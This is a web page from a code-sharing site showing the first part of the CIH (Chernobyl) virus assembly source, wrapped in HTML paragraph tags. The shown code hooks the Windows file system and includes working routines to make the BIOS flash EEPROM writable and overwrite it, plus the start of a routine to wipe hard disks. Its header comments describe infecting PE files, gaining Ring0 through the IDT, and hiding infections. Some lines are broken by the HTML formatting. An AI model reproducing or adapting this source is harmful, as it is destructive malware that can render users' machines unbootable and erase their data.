cih源代码.htm
来自「CIH源代码」· HTM 代码 · 共 1,695 行 · 第 1/5 页
HTM
1,695 行
<P>jmp [eax] ; Jump to prevhook</P>
<P> </P>
<P>; *************************************</P>
<P>; * Call the Function that the IFS *</P>
<P>; * Manager Would Normally Call to *</P>
<P>; * Implement this Particular I/O *</P>
<P>; * Request. *</P>
<P>; *************************************</P>
<P> </P>
<P>pIFSFunc:</P>
<P>mov ebx, esp</P>
<P>push dword ptr [ebx+20h+04h+14h] ; Push pioreq</P>
<P>call [ebx+20h+04h] ; Call pIFSFunc</P>
<P>pop ecx ;</P>
<P> </P>
<P>mov [ebx+1ch], eax ; Modify EAX Value in Stack</P>
<P> </P>
<P>; ***************************</P>
<P>; * After Calling pIFSFunc, *</P>
<P>; * Get Some Data from the *</P>
<P>; * Returned pioreq. *</P>
<P>; ***************************</P>
<P> </P>
<P>cmp dword ptr [ebx+20h+04h+04h], 00000024h</P>
<P>jne QuitMyVirusFileSystemHook</P>
<P> </P>
<P>; *****************</P>
<P>; * Get the File *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; * Kill Kill Kill Kill Kill Kill Kill *</P>
<P>; **************************************</P>
<P> </P>
<P>; ***************************</P>
<P>; * Kill BIOS EEPROM *</P>
<P>; ***************************</P>
<P> </P>
<P>mov bp, 0cf8h</P>
<P>lea esi, IOForEEPROM-@7[esi]</P>
<P> </P>
<P>; ***********************</P>
<P>; * Show BIOS Page in *</P>
<P>; * 000E0000 - 000EFFFF *</P>
<P>; * ( 64 KB ) *</P>
<P>; ***********************</P>
<P> </P>
<P>mov edi, 8000384ch</P>
<P>mov dx, 0cfeh</P>
<P>cli</P>
<P>call esi</P>
<P> </P>
<P>; ***********************</P>
<P>; * Show BIOS Page in *</P>
<P>; * 000F0000 - 000FFFFF *</P>
<P>; * ( 64 KB ) *</P>
<P>; ***********************</P>
<P> </P>
<P>mov di, 0058h</P>
<P>dec edx ; and a</P>
<P>0fh</P>
<P>mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h</P>
<P>call esi</P>
<P> </P>
<P>; ***********************</P>
<P>; * Show the BIOS Extra *</P>
<P>; * ROM Data in Memory *</P>
<P>; * 000E0000 - 000E01FF *</P>
<P>; * ( 512 Bytes ) *</P>
<P>; * , and the Section *</P>
<P>; * of Extra BIOS can *</P>
<P>; * be Writted... *</P>
<P>; ***********************</P>
<P> </P>
<P>lea ebx, EnableEEPROMToWrite-@10[esi]</P>
<P> </P>
<P>mov eax, 0e5555h</P>
<P>mov ecx, 0e2aaah</P>
<P>call ebx</P>
<P>mov byte ptr [eax], 60h</P>
<P> </P>
<P>push ecx</P>
<P>loop $</P>
<P> </P>
<P>; ***********************</P>
<P>; * Kill the BIOS Extra *</P>
<P>; * ROM Data in Memory *</P>
<P>; * 000E0000 - 000E007F *</P>
<P>; * ( 80h Bytes ) *</P>
<P>; ***********************</P>
<P> </P>
<P>xor ah, ah</P>
<P>mov [eax], al</P>
<P> </P>
<P>xchg ecx, eax</P>
<P>loop $</P>
<P> </P>
<P>; ***********************</P>
<P>; * Show and Enable the *</P>
<P>; * BIOS Main ROM Data *</P>
<P>; * 000E0000 - 000FFFFF *</P>
<P>; * ( 128 KB ) *</P>
<P>; * can be Writted... *</P>
<P>; ***********************</P>
<P> </P>
<P>mov eax, 0f5555h</P>
<P>pop ecx</P>
<P>mov ch, 0aah</P>
<P>call ebx</P>
<P>mov byte ptr [eax], 20h</P>
<P> </P>
<P>loop $</P>
<P> </P>
<P>; ***********************</P>
<P>; * Kill the BIOS Main *</P>
<P>; * ROM Data in Memory *</P>
<P>; * 000FE000 - 000FE07F *</P>
<P>; * ( 80h Bytes ) *</P>
<P>; ***********************</P>
<P> </P>
<P>mov ah, 0e0h</P>
<P>mov [eax], al</P>
<P> </P>
<P>; ***********************</P>
<P>; * Hide BIOS Page in *</P>
<P>; * 000F0000 - 000FFFFF *</P>
<P>; * ( 64 KB ) *</P>
<P>; ***********************</P>
<P>; or al</P>
<P>0h</P>
<P>mov word ptr (BooleanCalculateCode-@10)[esi], 100ch</P>
<P>call esi</P>
<P> </P>
<P>; ***************************</P>
<P>; * Kill All HardDisk *</P>
<P>; ***************************************************</P>
<P>; * IOR Structure of IOS_SendCommand Needs *</P>
<P>; ***************************************************</P>
<P>; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *</P>
<P>; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *</P>
<P>; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *</P>
<P>; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *</P>
<P>; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *</P>
<P>; ***************************************************</P>
<P> </P>
<P>KillHardDisk:</P>
<P>xor ebx, ebx</P>
<P>mov bh, FirstKillHardDiskNumber</P>
<P>push ebx</P>
<P>sub esp, 2ch</P>
<P>push 0c0001000h</P>
<P>; ***************************</P>
<P>; * IO for EEPROM *</P>
<P>; ***************************</P>
<P> </P>
<P>IOForEEPROM:</P>
<P>@10 = IOForEEPROM</P>
<P> </P>
<P>xchg eax, edi</P>
<P>xchg edx, ebp</P>
<P>out dx, eax</P>
<P> </P>
<P>xchg eax, edi</P>
<P>xchg edx, ebp</P>
<P>in al, dx</P>
<P> </P>
<P>BooleanCalculateCode = $</P>
<P>or al, 44h</P>
<P> </P>
<P>xchg eax, edi</P>
<P>xchg edx, ebp</P>
<P>out dx, eax</P>
<P> </P>
<P>xchg eax, edi</P>
<P>xchg edx, ebp</P>
<P>out dx, al</P>
<P> </P>
<P>ret</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Static Data *</P>
<P>; *********************************************************</P>
<P> </P>
<P>LastVxDCallAddress = IFSMgr_Ring0_FileIO</P>
<P>VxDCallAddressTable db 00h</P>
<P>db IFSMgr_RemoveFileSystemApiHook-_PageAllocate</P>
<P>db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook</P>
<P>db IFSMgr_Ring0_FileIO-UniToBCSPath</P>
<P> </P>
<P>VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h</P>
<P>VxDCallTableSize = ($-VxDCallIDTable)/04h</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Virus Version Copyright *</P>
<P>; *********************************************************</P>
<P> </P>
<P>VirusVersionCopyright db 'CIH v'</P>
<P>db MajorVirusVersion+'0'</P>
<P>db '.'</P>
<P>db MinorVirusVersion+'0'</P>
<P>db ' TTIT'</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Virus Size *</P>
<P>; *********************************************************</P>
<P> </P>
<P>VirusSize = $</P>
<P>; + SizeOfVirusCodeSectionTableEndMark(04h)</P>
<P>; + NumberOfSections(??)*SizeOfVirusCodeSectionTa</P>
<P>e(08h)</P>
<P>; + SizeOfTheFirstVirusCodeSectionTable(04h)</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Dynamic Data *</P>
<P>; *********************************************************</P>
<P> </P>
<P>VirusGameDataStartAddress = VirusSize</P>
<P>PointerToRelocations = StartOfSectionTable+18h ; DWORD</P>
<P>PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD</P>
<P>NumberOfRelocations = StartOfSectionTable+20h ; WORD</P>
<P>NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD</P>
<P>Characteristics = StartOfSectionTable+24h ; DWORD</P>
<P>SizeOfScetionTable = Characteristics+04h-SectionName</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Virus Total Need Memory *</P>
<P>; *********************************************************</P>
<P> </P>
<P>VirusNeedBaseMemory = $</P>
<P> </P>
<P>VirusTotalNeedMemory = @9</P>
<P>; + NumberOfSections(??)*SizeOfScetionTable(28h)</P>
<P>; + SizeOfVirusCodeSectionTableEndMark(04h)</P>
<P>; + NumberOfSections(??)*SizeOfVirusCodeSectionTa</P>
<P>e(08h)</P>
<P>; + SizeOfTheFirstVirusCodeSectionTable(04h)</P>
<P> </P>
<P>; *********************************************************</P>
<P>; *********************************************************</P>
<P>;
****************************************************************************</P>
<P>; * The Virus Program Information *</P>
<P>;
****************************************************************************</P>
<P>; * *</P>
<P>; * Designer : CIH Original Place : TTIT of Taiwan *</P>
<P>; * Create Date : 04/26/1998 Now Version : 1.3 *</P>
<P>; * Modification Time : 05/24/1998 *</P>
<P>; * *</P>
<P>;
*==========================================================================*</P>
<P>; * Modification History *</P>
<P>;
*==========================================================================*</P>
<P>; * v1.0 1. Create the Virus Program. *</P>
<P>; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *</P>
<P>; * 04/26/1998 3. Virus Code doesn't Reload into System. *</P>
<P>; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *</P>
<P>; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *</P>
<P>; * 6. When System Opens Existing PE File, the File will be *</P>
<P>; * Infected, and the File doesn't be Reinfected. *</P>
<P>; * 7. It is also Infected, even the File is Read-Only. *</P>
<P>; * 8. When the File is Infected, the Modification Date and Time *</P>
<P>; * of the File also don't be Changed. *</P>
<P>; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *</P>
<P>; * Previous FileSystemApiHook, it will Call the Function *</P>
<P>; * that the IFS Manager Would Normally Call to Implement *</P>
<P>; * this Particular I/O Request. *</P>
<P>; * 10. The Virus Size is only 656 Bytes. *</P>
<P>;
*==========================================================================*</P>
<P>; * v1.1 1. Especially, the File that be Infected will not Increase
*</P>
<P>; * it's Size... ^__^ *</P>
<P>; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *</P>
<P>; * When Exception Error Occurs, Our OS System should be in *</P>
<P>; * Windows NT. So My Cute Virus will not Continue to Run, *</P>
<P>; * it will Jmup to Original Application to Run. *</P>
<P>; * 3. Use Better Algorithm, Reduce Virus Code Size. *</P>
<P>; * 4. The Virus "Basic" Size is only 796 Bytes. *</P>
<P>;
*==========================================================================*</P>
<P>; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *</P>
<P>; * 2. Modify the Bug of v1.1 *</P>
<P>; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *</P>
<P>;
*==========================================================================*</P>
<P>; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error.
*</P>
<P>; * So When Open WinZip Self-Extractor ==> Don't Infect it. *</P>
<P>; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *</P>
<P>;
****************************************************************************</P>
<P> </P>
<P>.586P</P>
<P> </P>
<P>;
****************************************************************************</P>
<P>; * Original PE Executable File(Don't Modify this Section) *</P>
<P>;
****************************************************************************</P>
<P> </P>
<P>OriginalAppEXE SEGMENT</P>
<P> </P>
<P>FileHeader:</P>
<P>db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h</P>
<P>db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h</P>
<P>db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h</P>
<P>db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh</P>
<P>db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h</P>
<P>db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h</P>
<P>db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh</P>
<P>db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh</P>
<P>db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h</P>
<P>db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah</P>
<P>db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h</P>
<P>db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h</P>
<P>db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h</P>
<P>db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h</P>
<P>db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?